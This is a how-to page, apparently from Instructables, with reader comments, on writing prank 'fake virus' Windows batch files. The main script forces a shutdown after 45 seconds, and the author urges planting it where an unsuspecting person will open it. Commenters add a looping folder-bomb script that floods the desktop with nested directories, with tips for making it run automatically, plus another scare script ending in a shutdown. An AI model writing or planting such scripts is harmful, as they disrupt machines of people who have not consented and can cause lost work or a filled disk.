Introduction: How to Make a Fake Virus With a Batch File

In this Instructable I will be showing you how to make a batch file, that should fool your friends into thinking that their computer has a virus. It will look something like the above image when it's running. At the end of the program a message will pop up that says "Your computer has committed suicide. Good-bye". Then the computer will shutdown. To cancel the shutdown procces type "shutdown /a" into command prompt and press enter.

Step 1: Open Notepad

Open the typing program notepad on your computer. You'll use notepad to make the batch file.

Step 2: Write the Program

If you have experience writing batch files feel free to modify and improve the below code, If you don't have experience than simply copy and paste the code into notepad. Save the file as a ".bat" file, such as "Virus.bat".

@echo off

shutdown -s -t 45 /c  Your computer has committed suicide. Have a nice day.

Step 3: Congratulations!

The program is ready to freak out the unfortunate person that happens to open it. Just plant it somewhere that you know a person will stumble on it, and wait.

i dont get any of this could you make a simpler version for a 7th grader perhaps ??!

Its already simple but ill try to help you figure it out. Assuming you have windows type cmd in the run bar to open a Command Promt. This is where you run text commands (instruction that your machine understands). Behind the scenes everything you do on Windows with mouse clicks is just text commands running behind a GUI(Graphical User Interface). Once in "CMD" to get a list of all commands and what they do, type "help" and press Enter. You can also Goggle CMD commands for more detailed information. A batch file(.bat) is just a type of file extension that when ever double clicked will run what ever commands are inside. To make one, just open a text editor, type commands, and save as "SomeName.bat". Now for a short over simplified explanation of the code above... Echo off is just to hide commands, try in cmd and you will no longer see what directory your in after typing any command. Next a location is picked for where the files should be made. mkdir is the command to make a new directory(folder) followed by a location on the drive where it will be made. Some more code to make folders with in folders is put in a Loop(process that repeats steps over and over). Then pause>nul is there as a safety net in case any curious person is unfortunate enough to run this code, it will stop the loop and prevent the code from automatically drowning your system in directories. Hope that helps

Just do: shutdown -s
And if you want to do more, just do shutdown /? in the command prompt.

how would you make it kill all processes except cmd

Can I make folders that contain a folder that contain more folders that contain folder and so on? Just like bombing.

Sure.

@Echo Off

:Variables

set Location=\File

set Start=C:\Users\%Username%\Desktop\Start

Rem Making Dir..

mkdir C:\Users\%Username%\Desktop\Start

:Loop

set Path=%Start%

mkdir %Start%%Location%

set Start=%Start%%Location%

pause>nul

goto Loop

Remove the "pause>nul" to make it automatic. But I warn you, don't do this to your own computer.

do we have 45 sec before shutdown? i read the bottom and saw -t 45 so i guess we have 45 sec to write shutdown -a

HERE REALLY VIRUSES (NOT FAKE VIRUS) Note:This will crash your computer if you not using virtualbox or vmware

What the viruses

You system paused at startup

CODE:

@echo Delete virus pc now?
pause
tree
@echo Deleting done
pause
@echo The system detector was incorrupted. Continue?
pause
dir
@echo Detected 2 Viruses. Delete now?
pause
tree
@echo ACCES DENIED
@echo ACCES DENIED
@echo ACCES DENIED
pause
@echo System was crash. Would you shutdown your computer?
shutdown
end

its real???

how to recover from the crash!?

just hold power button and restart
